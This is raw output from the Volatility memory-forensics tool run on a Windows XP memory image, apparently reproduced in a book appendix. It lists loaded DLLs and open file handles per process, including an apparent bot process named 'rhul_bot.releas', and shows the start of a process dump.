0x72550000 0x4f000 C:\WINDOWS\System32\pdh.dll
0x763b0000 0x45000 C:\WINDOWS\system32\comdlg32.dll
0x71950000 0xe4000 C:\WINDOWS\WinSxS\X86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\COMCTL32.dll
0x1f7b0000 0x31000 C:\WINDOWS\System32\ODBC32.dll
0x1f9b0000 0x6000 C:\WINDOWS\System32\odbcbcp.dll
0x723d0000 0x1a000 C:\WINDOWS\System32\WinSCard.dll
0x76080000 0x61000 C:\WINDOWS\System32\MSVCP60.dll
0x360000 0x10000 C:\WINDOWS\System32\MSVCIRT.dll
0x1f850000 0x16000 C:\WINDOWS\System32\odbcint.dll
0x5ad70000 0x34000 C:\WINDOWS\system32\uxtheme.dll
0xcd0000 0x42000 C:\WINDOWS\System32\wsfwDS.dll
0xd20000 0x41000 C:\WINDOWS\System32\wsimd.dll
0x73000000 0x23000 C:\WINDOWS\System32\WINSPOOL.DRV
0xee0000 0x17b000 C:\WINDOWS\System32\DSA.dll
0xffd0000 0x22000 C:\WINDOWS\System32\rsaenh.dll
************************************************************************
explorer.exe pid: 1656
Command line : C:\WINDOWS\Explorer.EXE
112
Base Size Path
0x1000000 0xf7000 C:\WINDOWS\Explorer.EXE
0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll
0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll
0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll
0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll
0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll
0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll
0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll
0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll
0x773d0000 0x7f4000 C:\WINDOWS\system32\SHELL32.dll
0x771b0000 0x11a000 C:\WINDOWS\system32\ole32.dll
0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.dll
0x75f80000 0xfc000 C:\WINDOWS\System32\BROWSEUI.dll
0x769c0000 0x149000 C:\WINDOWS\System32\SHDOCVW.dll
0x5ad70000 0x34000 C:\WINDOWS\System32\UxTheme.dll
0x71950000 0xe4000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll
0x77340000 0x8b000 C:\WINDOWS\system32\comctl32.dll
0x75f40000 0x1d000 C:\WINDOWS\system32\appHelp.dll
0x76fd0000 0x78000 C:\WINDOWS\System32\CLBCATQ.DLL
0x77050000 0xc5000 C:\WINDOWS\System32\COMRes.dll
0x77c00000 0x7000 C:\WINDOWS\system32\VERSION.dll
0x76620000 0x4e000 C:\WINDOWS\System32\cscui.dll
0x76600000 0x1b000 C:\WINDOWS\System32\CSCDLL.dll
0x5b630000 0x70000 C:\WINDOWS\System32\themeui.dll
0x76f90000 0x10000 C:\WINDOWS\System32\Secur32.dll
0x76380000 0x5000 C:\WINDOWS\System32\MSIMG32.dll
0x75a70000 0xa3000 C:\WINDOWS\system32\USERENV.dll
0x71c20000 0x4f000 C:\WINDOWS\System32\netapi32.dll
0x71bf0000 0x11000 C:\WINDOWS\System32\SAMLIB.dll
0x76670000 0xe4000 C:\WINDOWS\System32\SETUPAPI.dll
0x75cf0000 0x190000 C:\WINDOWS\system32\NETSHELL.dll
0x76c00000 0x2d000 C:\WINDOWS\system32\credui.dll
0x71ab0000 0x15000 C:\WINDOWS\system32\WS2_32.dll
0x71aa0000 0x8000 C:\WINDOWS\system32\WS2HELP.dll
0x76d60000 0x15000 C:\WINDOWS\system32\iphlpapi.dll
0x76de0000 0x26000 C:\WINDOWS\system32\netman.dll
0x76d40000 0x16000 C:\WINDOWS\system32\MPRAPI.dll
0x76e40000 0x2f000 C:\WINDOWS\system32\ACTIVEDS.dll
0x76e10000 0x24000 C:\WINDOWS\system32\adsldpc.dll
0x76f60000 0x2c000 C:\WINDOWS\system32\WLDAP32.dll
0x76b20000 0x15000 C:\WINDOWS\system32\ATL.DLL
0x76e80000 0xd000 C:\WINDOWS\system32\rtutils.dll
0x76ee0000 0x37000 C:\WINDOWS\system32\RASAPI32.dll
0x76e90000 0x11000 C:\WINDOWS\system32\rasman.dll
0x76eb0000 0x2a000 C:\WINDOWS\system32\TAPI32.dll
0x76b40000 0x2c000 C:\WINDOWS\system32\WINMM.dll
0x76da0000 0x30000 C:\WINDOWS\system32\WZCSvc.DLL
0x76d30000 0x4000 C:\WINDOWS\system32\WMI.dll
0x76d80000 0x1a000 C:\WINDOWS\system32\DHCPCSVC.DLL
0x76f20000 0x25000 C:\WINDOWS\system32\DNSAPI.dll
0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll
0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll
0x76f50000 0x8000 C:\WINDOWS\system32\WTSAPI32.dll
0x76360000 0xf000 C:\WINDOWS\system32\WINSTA.dll
0x76990000 0x24000 C:\WINDOWS\System32\ntshrui.dll
0x76400000 0x1fb000 C:\WINDOWS\System32\msi.dll
0x74b30000 0x41000 C:\WINDOWS\System32\webcheck.dll
0x74b00000 0x20000 C:\WINDOWS\System32\stobject.dll
0x74af0000 0x9000 C:\WINDOWS\System32\BatMeter.dll
0x74ad0000 0x7000 C:\WINDOWS\System32\POWRPROF.dll
0x72430000 0x12000 C:\WINDOWS\System32\browselc.dll
0x76200000 0x97000 C:\WINDOWS\system32\WININET.dll
0x760f0000 0x78000 C:\WINDOWS\system32\urlmon.dll
0x71b20000 0x11000 C:\WINDOWS\system32\MPR.dll
0x75f60000 0x6000 C:\WINDOWS\System32\drprov.dll
0x71c10000 0xd000 C:\WINDOWS\System32\ntlanman.dll
0x71cd0000 0x16000 C:\WINDOWS\System32\NETUI0.dll
0x71c90000 0x3c000 C:\WINDOWS\System32\NETUI1.dll
0x71c80000 0x6000 C:\WINDOWS\System32\NETRAP.dll
113
0x75f70000 0x9000 C:\WINDOWS\System32\davclnt.dll
0x6c1b0000 0x43000 C:\WINDOWS\System32\DUSER.dll
0x75970000 0xf1000 C:\WINDOWS\System32\MSGINA.dll
0x1f7b0000 0x31000 C:\WINDOWS\System32\ODBC32.dll
0x763b0000 0x45000 C:\WINDOWS\system32\comdlg32.dll
0x1f850000 0x16000 C:\WINDOWS\System32\odbcint.dll
0x74b80000 0x82000 C:\WINDOWS\System32\printui.dll
0x73000000 0x23000 C:\WINDOWS\System32\WINSPOOL.DRV
0x74ae0000 0x7000 C:\WINDOWS\System32\CFGMGR32.dll
0x5c060000 0x12000 C:\WINDOWS\System32\srclient.dll
0x692c0000 0x2e000 C:\WINDOWS\System32\Wbem\framedyn.dll
0x75e90000 0xa1000 C:\WINDOWS\System32\SXS.DLL
0x76170000 0x88000 C:\WINDOWS\System32\shdoclc.dll
0x71d40000 0x1b000 C:\WINDOWS\System32\actxprxy.dll
************************************************************************
msmsgs.exe pid: 792
Command line : "C:\Program Files\Messenger\msmsgs.exe" /background
Base Size Path
0x400000 0x107000 C:\Program Files\Messenger\msmsgs.exe
0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll
0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll
0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.DLL
0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll
0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.DLL
0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll
0x771b0000 0x11a000 C:\WINDOWS\system32\OLE32.DLL
0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.DLL
0x77c10000 0x53000 C:\WINDOWS\system32\MSVCRT.DLL
0x71950000 0xe4000 C:\WINDOWS\WinSxS\X86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\COMCTL32.DLL
0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll
0x773d0000 0x7f4000 C:\WINDOWS\system32\SHELL32.DLL
0x5ad70000 0x34000 C:\WINDOWS\system32\uxtheme.dll
0x69200000 0x24000 C:\Program Files\Messenger\MSGSLANG.DLL
0x76fd0000 0x78000 C:\WINDOWS\System32\CLBCATQ.DLL
0x77050000 0xc5000 C:\WINDOWS\System32\COMRes.dll
0x77c00000 0x7000 C:\WINDOWS\system32\VERSION.dll
0x75e90000 0xa1000 C:\WINDOWS\System32\SXS.DLL
0x76f50000 0x8000 C:\WINDOWS\System32\wtsapi32.dll
0x76360000 0xf000 C:\WINDOWS\System32\WINSTA.dll
0x76b70000 0x3d000 C:\WINDOWS\System32\es.dll
0x71ab0000 0x15000 C:\WINDOWS\System32\WS2_32.dll
0x71aa0000 0x8000 C:\WINDOWS\System32\WS2HELP.dll
0x76c00000 0x2d000 C:\WINDOWS\System32\credui.dll
0x76200000 0x97000 C:\WINDOWS\system32\wininet.dll
0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll
0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll
0x76f90000 0x10000 C:\WINDOWS\System32\Secur32.dll
0x722b0000 0x5000 C:\WINDOWS\System32\sensapi.dll
************************************************************************
wuauclt.exe pid: 484
Command line : "C:\WINDOWS\System32\wuauclt.exe"
Base Size Path
0x1000000 0x1e000 C:\WINDOWS\System32\wuauclt.exe
0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll
0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll
0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll
0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll
0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll
0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll
0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll
0x773d0000 0x7f4000 C:\WINDOWS\system32\SHELL32.dll
0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll
0x771b0000 0x11a000 C:\WINDOWS\system32\ole32.dll
0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.dll
114
0x760f0000 0x78000 C:\WINDOWS\system32\urlmon.dll
0x77c00000 0x7000 C:\WINDOWS\system32\VERSION.dll
0x71950000 0xe4000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\COMCTL32.dll
0x76f50000 0x8000 C:\WINDOWS\System32\WTSAPI32.dll
0x76360000 0xf000 C:\WINDOWS\System32\WINSTA.dll
0x76200000 0x97000 C:\WINDOWS\system32\WININET.dll
0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll
0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll
0x5ad70000 0x34000 C:\WINDOWS\system32\uxtheme.dll
0x74e30000 0x6b000 C:\WINDOWS\System32\RICHED20.dll
0x76fd0000 0x78000 C:\WINDOWS\System32\CLBCATQ.DLL
0x77050000 0xc5000 C:\WINDOWS\System32\COMRes.dll
0x75e90000 0xa1000 C:\WINDOWS\System32\SXS.DLL
0x76f90000 0x10000 C:\WINDOWS\System32\Secur32.dll
0x76ee0000 0x37000 C:\WINDOWS\System32\RASAPI32.DLL
0x76e90000 0x11000 C:\WINDOWS\System32\rasman.dll
0x71ab0000 0x15000 C:\WINDOWS\System32\WS2_32.dll
0x71aa0000 0x8000 C:\WINDOWS\System32\WS2HELP.dll
0x71c20000 0x4f000 C:\WINDOWS\System32\NETAPI32.dll
0x76eb0000 0x2a000 C:\WINDOWS\System32\TAPI32.dll
0x76e80000 0xd000 C:\WINDOWS\System32\rtutils.dll
0x76b40000 0x2c000 C:\WINDOWS\System32\WINMM.dll
0x722b0000 0x5000 C:\WINDOWS\System32\sensapi.dll
0x75a70000 0xa3000 C:\WINDOWS\system32\USERENV.dll
0x76d40000 0x16000 C:\WINDOWS\System32\MPRAPI.dll
0x76e40000 0x2f000 C:\WINDOWS\System32\ACTIVEDS.dll
0x76e10000 0x24000 C:\WINDOWS\System32\adsldpc.dll
0x76f60000 0x2c000 C:\WINDOWS\system32\WLDAP32.dll
0x76b20000 0x15000 C:\WINDOWS\System32\ATL.DLL
0x71bf0000 0x11000 C:\WINDOWS\System32\SAMLIB.dll
0x76670000 0xe4000 C:\WINDOWS\System32\SETUPAPI.dll
************************************************************************
rhul_bot.releas pid: 452
Unable to read PEB for task.
************************************************************************
Nigilant32.exe pid: 816
Unable to read PEB for task.
bash-3.2$ python volatility files -f ../memory.img
************************************************************************
Pid: 4
File \Documents and Settings\NetworkService\ntuser.dat.LOG
File \WINDOWS\system32\config\system.LOG
File \WINDOWS\system32\config\SAM.LOG
File \WINDOWS\system32\config\default.LOG
File \WINDOWS\system32\config\default
File \WINDOWS\system32\config\system
File \WINDOWS\system32\config\software.LOG
File \WINDOWS\system32\config\software
File \WINDOWS\system32\config\SECURITY
File \WINDOWS\system32\config\SECURITY.LOG
File \pagefile.sys
File \Documents and Settings\NetworkService\Local Settings\Application
Data\Microsoft\Windows\UsrClass.dat
File \Documents and Settings\NetworkService\NTUSER.DAT
File \WINDOWS\system32\config\SAM
File \Documents and Settings\NetworkService\Local Settings\Application
Data\Microsoft\Windows\UsrClass.dat.LOG
File \Documents and Settings\LocalService\Local Settings\Application
Data\Microsoft\Windows\UsrClass.dat
File \Documents and Settings\LocalService\ntuser.dat.LOG
File \Documents and Settings\LocalService\NTUSER.DAT
File \Documents and Settings\LocalService\Local Settings\Application
Data\Microsoft\Windows\UsrClass.dat.LOG
File \255
File \
File \Documents and Settings\steve\NTUSER.DAT
File \Documents and Settings\steve\ntuser.dat.LOG
File \Documents and Settings\steve\Local Settings\Application
Data\Microsoft\Windows\UsrClass.dat
115
File \Documents and Settings\steve\Local Settings\Application
Data\Microsoft\Windows\UsrClass.dat.LOG
************************************************************************
Pid: 800
File \WINDOWS
File \WINDOWS\system32
************************************************************************
Pid: 888
File \WINDOWS\system32
************************************************************************
Pid: 912
File \TerminalServer\AutoReconnect
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \InitShutdown
File \InitShutdown
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\AppPatch
File \WINDOWS\system32\dllcache
File \Program Files\Common Files\Microsoft Shared\web server
extensions\40\isapi\_vti_adm
File \Program Files\Common Files\Microsoft Shared\web server
extensions\40\_vti_bin\_vti_adm
File \WINDOWS\system32
File \Program Files\Common Files\Microsoft Shared\web server
extensions\40\isapi\_vti_aut
File \Program Files\Common Files\Microsoft Shared\web server
extensions\40\_vti_bin\_vti_aut
File \WINDOWS\system32\inetsrv
File \Program Files\Common Files\Microsoft Shared\web server extensions\40\bin
File \WINDOWS\Fonts
File \WINDOWS\system32\drivers
File \Program Files\Common Files\Microsoft Shared\web server
extensions\40\servsupp
File \Program Files\Common Files\Microsoft Shared\web server
extensions\40\bots\vinavbar
File \Program Files\microsoft frontpage\version3.0\bin
File \Program Files\Common Files\Microsoft Shared\web server
extensions\40\_vti_bin
File \Program Files\Common Files\Microsoft Shared\web server
extensions\40\bin\1033
File \Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi
File \WINDOWS
File \Program Files\Common Files\Microsoft Shared\DAO
File \Program Files\Windows Media Player
File \Program Files\Common Files\System\msadc
File \Program Files\Common Files\System\ado
File \Program Files\Common Files\System\Ole DB
File \WINDOWS\inf
File \WINDOWS\system
File \WINDOWS\msagent
File \WINDOWS\msagent\intl
File \Program Files\MSN Gaming Zone\Windows
File \WINDOWS\Help
File \WINDOWS\PCHEALTH\HELPCTR\Binaries
File \Program Files\NetMeeting
File \WINDOWS\system32\drivers\disdn
File \WINDOWS\ime\CHTIME\Applets
File \WINDOWS\system32\wbem
File \WINDOWS\system32\IME\CINTLGNT
File \WINDOWS\system32\Com
File \WINDOWS\system32\Setup
File \WINDOWS\ime\imjp8_1
File \Program Files\Common Files\Microsoft Shared\Triedit
File \Program Files\Windows NT
File \Program Files\Common Files\System
File \WINDOWS\system32\1033
File \Program Files\Common Files\Microsoft Shared\web server
extensions\40\admcgi\scripts
File \Program Files\Common Files\Microsoft Shared\web server
116
extensions\40\admisapi\scripts
File \WINDOWS\system32\usmt
File \WINDOWS\ime\imkr6_1\dicts
File \WINDOWS\system32\mui\0009
File \Program Files\Internet Explorer
File \WINDOWS\ime\imjp8_1\applets
File \WINDOWS\ime\imkr6_1\applets
File \WINDOWS\system32\xircom
File \Program Files\Internet Explorer\Connection Wizard
File \Program Files\Common Files\Microsoft Shared\MSInfo
File \WINDOWS\ime\imkr6_1
File \WINDOWS\ime\shared
File \WINDOWS\system32\IME\PINTLGNT
File \Program Files\Common Files\SpeechEngines\Microsoft\Lexicon\1033
File \WINDOWS\Resources\Themes\Luna
File \Program Files\Movie Maker
File \WINDOWS\ime
File \WINDOWS\srchasst
File \Program Files\Outlook Express
File \WINDOWS\system32\oobe
File \Program Files\Common Files\MSSoap\Binaries
File \Program Files\Common Files\MSSoap\Binaries\Resources\1033
File \WINDOWS\mui
File \WINDOWS\system32\npp
File \WINDOWS\ime\shared\res
File \Program Files\Windows NT\Pinball
File \WINDOWS\ime\chsime\applets
File \WINDOWS\system32\Restore
File \Program Files\Common Files\SpeechEngines\Microsoft\TTS\1033
File \Program Files\Common Files\Microsoft Shared\Speech
File \WINDOWS\Resources\Themes\Luna\Shell\NormalColor
File \WINDOWS\Resources\Themes\Luna\Shell\Homestead
File \WINDOWS\Resources\Themes\Luna\Shell\Metallic
File \WINDOWS\system32\wbem\snmp
File \Program Files\Common Files\SpeechEngines\Microsoft
File \Program Files\Common Files\Microsoft Shared\Speech\1033
File \WINDOWS\system32\spool\drivers\color
File \WINDOWS\system32\Macromed\Flash
File \WINDOWS\system32\IME\TINTLGNT
File \WINDOWS\Help\Tours\mmTour
File \WINDOWS\PCHEALTH\UploadLB\Binaries
File \Program Files\Common Files\Microsoft Shared\VGX
File \WINDOWS\system32\wbem\xml
File \Program Files\Windows NT\Accessories
File \Program Files\xerox\nwwia
File \WINDOWS\WinSxS
File \SfcApi
File \SfcApi
File \ntsvcs
File \ProfMapApi
File \ProfMapApi
File \winlogonrpc
File \winlogonrpc
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File sgsvc
File \AudioSrv
File \WINDOWS\system32
************************************************************************
Pid: 956
File \WINDOWS\system32
File \ntsvcs
File \ntsvcs
File \scerpc
File \scerpc
File \svcctl
File \net\NtControlPipe1
File \net\NtControlPipe1
File \net\NtControlPipe2
File \WINDOWS\system32\config\ACS.evt
File \WINDOWS\system32\config\AppEvent.Evt
117
File \WINDOWS\system32\config\SecEvent.Evt
File \WINDOWS\system32\config\SysEvent.Evt
File \ntsvcs
File \net\NtControlPipe3
File \ntsvcs
File \net\NtControlPipe0
File \ntsvcs
File \PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
File \ntsvcs
File \net\NtControlPipe4
File \ntsvcs
File \net\NtControlPipe5
File \ntsvcs
File \ntsvcs
File \ntsvcs
File \net\NtControlPipe6
File \ntsvcs
File \ntsvcs
File \net\NtControlPipe7
File \ntsvcs
File \ntsvcs
File \ntsvcs
File \ntsvcs
File \ntsvcs
File \ntsvcs
File \ntsvcs
File \ntsvcs
File \ntsvcs
File \ntsvcs
File \ntsvcs
File \ntsvcs
File \ntsvcs
File \ntsvcs
File \ntsvcs
************************************************************************
Pid: 968
File \WINDOWS\system32
File \net\NtControlPipe0
File \WINDOWS\Debug\PASSWD.LOG
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \protected_storage
File \protected_storage
File \lsass
File \lsass
File \lsass
File \uccd8\ue194sass
File \WINDOWS\Debug\oakley.log
File \svcctl
File \Endpoint
File \Endpoint
File \Endpoint
File \255
File \ipsec
File \ipsec
File \lsass
************************************************************************
Pid: 1148
File \WINDOWS\system32
File \net\NtControlPipe2
File \Endpoint
File \Endpoint
File \Winsock2\CatalogChangeListener-47c-0
File \Endpoint
File \Endpoint
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
118
File \Endpoint
File \epmapper
File \epmapper
File \svcctl
File \Endpoint
************************************************************************
Pid: 1276
File \WINDOWS\system32
File \net\NtControlPipe3
File \svcctl
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \DhcpClient
File \Endpoint
File \Endpoint
File \ntsvcs
File \Ctx_WinStation_API_service
File \Ctx_WinStation_API_service
File \svcctl
File \WINDOWS\SchedLgU.Txt
File \Endpoint
File \Winsock2\CatalogChangeListener-4fc-0
File \atsvc
File \atsvc
File \Endpoint
File \WINDOWS\Tasks
File \AudioSrv
File \AudioSrv
File \wkssvc
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \svcctl
File \svcctl
File \Endpoint
File \svcctl
File \WINDOWS\system32\wbem\mof
File \SECLOGON
File \SECLOGON
File \svcctl
File \svcctl
File \svcctl
File \svcctl
File \W32TIME
File \W32TIME
File \svcctl
File \svcctl
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \svcctl
File \PCHHangRepExecPipe
File \PCHFaultRepExecPipe
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \wkssvc
File \AudioSrv
File \WINDOWS\system32\config\systemprofile\Local
Settings\History\History.IE5\index.dat
File \wkssvc
************************************************************************
Pid: 1568
File \WINDOWS\system32
File \net\NtControlPipe4
File \svcctl
File \WINDOWS\system32\drivers\etc
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
119
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \Endpoint
************************************************************************
Pid: 1592
File \WINDOWS\system32
File \net\NtControlPipe5
File \svcctl
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \Documents and Settings\LocalService\Local Settings\Temporary Internet
Files\Content.IE5\index.dat
File \Documents and Settings\LocalService\Cookies\index.dat
File \Documents and Settings\LocalService\Local
Settings\History\History.IE5\index.dat
File \DAV RPC SERVICE
File \DAV RPC SERVICE
File \winreg
File \winreg
File \Endpoint
File \ssdpsrv
File \ssdpsrv
File \Endpoint
File \Endpoint
File \AsyncSelectHlp
File \DAV RPC SERVICE
************************************************************************
Pid: 1788
File \WINDOWS\system32
File \net\NtControlPipe6
File \svcctl
File \spoolss
File \spoolss
File \ntsvcs
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
************************************************************************
Pid: 1960
File \WINDOWS\system32
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \net\NtControlPipe7
File \svcctl
File \ntsvcs
************************************************************************
Pid: 1656
File \Documents and Settings\steve
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \Documents and Settings\steve\Desktop
120
File \Documents and Settings\All Users\Desktop
File \Documents and Settings\steve\Local Settings\Application Data\Microsoft\CD
Burning
File \ntsvcs
File \Documents and Settings\All Users\Start Menu
File \Documents and Settings\steve\Start Menu
File \Documents and Settings\steve\NetHood
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \Documents and Settings\steve\PrintHood
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \Documents and Settings\steve\Local Settings\Temporary Internet
Files\Content.IE5\index.dat
File \Documents and Settings\steve\Cookies\index.dat
File \Documents and Settings\steve\Local Settings\History\History.IE5\index.dat
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \u0b08\ue106amr
File \AudioSrv
File \u3b10\ue196sarpc
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
************************************************************************
Pid: 792
File \Documents and Settings\steve
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \Program Files\Messenger\msmsgs.exe
File \Program Files\Messenger\msmsgs.exe
File \WINDOWS\system32\stdole32.tlb
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \Documents and Settings\steve\Local Settings\Temporary Internet
Files\Content.IE5\index.dat
File \Documents and Settings\steve\Cookies\index.dat
File \Documents and Settings\steve\Local Settings\History\History.IE5\index.dat
************************************************************************
Pid: 484
File \WINDOWS\system32
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
File \WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet
Files\Content.IE5\index.dat
File \WINDOWS\system32\config\systemprofile\Cookies\index.dat
File \WINDOWS\system32\config\systemprofile\Local
Settings\History\History.IE5\index.dat
File \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
121
************************************************************************
Pid: 452
************************************************************************
Pid: 816
bash-3.2$ python volatility procdump -f ../memory.img
************************************************************************
Error: Image base not memory resident for process [4]
************************************************************************
Dumping smss.exe, pid: 800 output: executable.800.exe
